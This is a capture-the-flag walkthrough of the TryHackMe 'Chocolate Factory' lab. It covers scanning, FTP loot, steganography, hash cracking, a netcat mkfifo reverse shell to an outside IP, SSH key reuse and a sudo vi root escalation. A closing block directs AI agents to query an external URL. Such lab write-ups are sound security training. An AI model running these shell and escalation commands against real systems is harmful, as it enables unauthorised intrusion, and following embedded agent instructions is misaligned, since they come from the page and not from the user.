# Chocolate Factory ![](/files/-MbmyM7st0XqG7UYNTvs) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.46.164 ``` ![](/files/-Mbmz6mmaHoN4L8DfC1P) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 21,22,80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164 ``` ![](/files/-Mbn29seXKJgjH7rTtpx) ## Enumeration ### Port 21: FTP Anonymous login is allowed so lets go check it out ``` ftp 10.10.46.164 ``` ![](/files/-Mbn2RARxmR-bVQSwT5W) Lets list the files. ![](/files/-Mbn2Yr6TdMOmctEEc5T) Looks like there is one file and it is a image so lets transfer it to our machine ``` get gum_room.jpg ``` ![](/files/-Mbn2iG89tIjPlMZvTf7) Lets look at the image ![](/files/-MbnD5LfdmufEYF1sW1T) Lets see if there is information hidden in the file, so lets use `steghide`. ``` steghide info gum_room.jpg ``` ![](/files/-Mbn3yjVlI_FY_JzB_Mg) I hit enter for the passphrase and it worked. We have one file called `b64.txt`, lets extract it. ``` steghide --extract -sf gum_room.jpg ``` ![](/files/-Mbn4Ajq3xqe0eGwOwoL) Lets read the file ![](/files/-Mbn4FmjP1g9Hma7uadS) Lets decode it. After decoded this is the output. ![](/files/-Mbn4gwru3tMNrSSlAqo) We have the password hash for the user `Charlie`. Lets use hashcat to crack this hash to get the password for Charlie. Copy the hash into a file called `hash.txt`. ![](/files/-Mbn5H9SYnLwY8e7-MvS) And now lets use `hashcat` to crack it. ```bash hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt ``` ![](/files/-MbnB4NVZPRriY9jk8Qs) We found the `password: cn7824` , lets try to login through ssh. ```bash ssh charlie@10.10.46.164 ``` ![](/files/-MbnBO4rpdqP-QozvMgx) Looks like this is not the password for ssh, lets go explore port 80 ### Port 80: HTTP Lets visit the website ![](/files/-MbnAxmFR5YyXQnD6tKP) Its a login page, remember the credentials we found, lets use them to login. ![](/files/-MbnB_nFPdy6hcPexDkR) We logged in , looks like we can run commands, and normal commands work so lets run a reverse shell and get a reverse shell, lets first start a netcat listener ```bash nc -lvnp 1234 ``` ![](/files/-MbnBothtnUWGk1N65vD) Lets get a reverse shell from [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f ``` Lets execute this command, and we get a reverse shell on the machine ![](/files/-MbnCGSAFB4powThNzIh) Lets stabilize this shell, using these commands ```bash python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo; fg reset Ctrl + C export TERM=xterm-color ``` ![](/files/-MbnCYogC1qT4gqIXlFZ) Lets list the files in the current directory ![](/files/-MbnCjvr0EhmIZinvUhF) We have a `validate.php` file, lets read it ![](/files/-MbnDEpDpsdlehKat3H7) We see the credentials we just used to login in the web page. I tried to run the key file but it said permission denied ![](/files/-MbnDnUCRTzLTlxjl2sI) So I used a command that lets us look at some information which is called `strings` and it gave me important information ```bash strings key_rev_key ``` ![](/files/-MbnE5LE7e3L5Nou5kB5) We have a key. With this information we can answer two questions in the room ![](/files/-MbnECknfX18oWjAr83F) I was enumerating when I realized that we can change directories into Charlie, so I listed the files and found the `user.txt` and some other files. ![](/files/-MbnF7jg1dAW71ENHOsY) Lets read the teleport file. ![](/files/-MbnFLsO9WHlxLtQdckd) Its a rsa private key, we can use this to login as `charlie` through ssh, lets do that. First copy the contents of the file into a file on your machine called `id_rsa`. ![](/files/-MbnFiJ-5qzIPUaPrNJX) Now we should change the permissions of the file ```bash chmod 600 id_rsa ``` ![](/files/-MbnFueZniGk5NXgCNIA) Now lets login ```bash ssh -i id_rsa charlie@10.10.46.164 ``` ![](/files/-MbnG5eZY1JvsD7r-IB7) We are logged in. ## Privilege Escalation Lets run `sudo -l` to see what we can run as root ```bash sudo -l ``` ![](/files/-MbnGWduFlBgURDowrka) Looks like we can run `/usr/bin/vi` as root so lets go to [GTFOBins ](https://gtfobins.github.io/gtfobins/vi/#sudo)to find the commands to escalate our privilege to root. ![](/files/-MbnGjVioryi2EkVXJ7U) Lets run this command ```bash sudo vi -c ':!/bin/sh' /dev/null ``` ![](/files/-MbnGrlL0R8QJZqt9LZa) We are now root, lets cd into the root folder to find the root flag, it looks like we need to run a python script to get the flag, lets run it, oh its asking for a key, remember when we found the key during enumeration, type that in and you should get the flag ![](/files/-MbnHh0aYXsq8jk0tMji) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/chocolate-factory.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.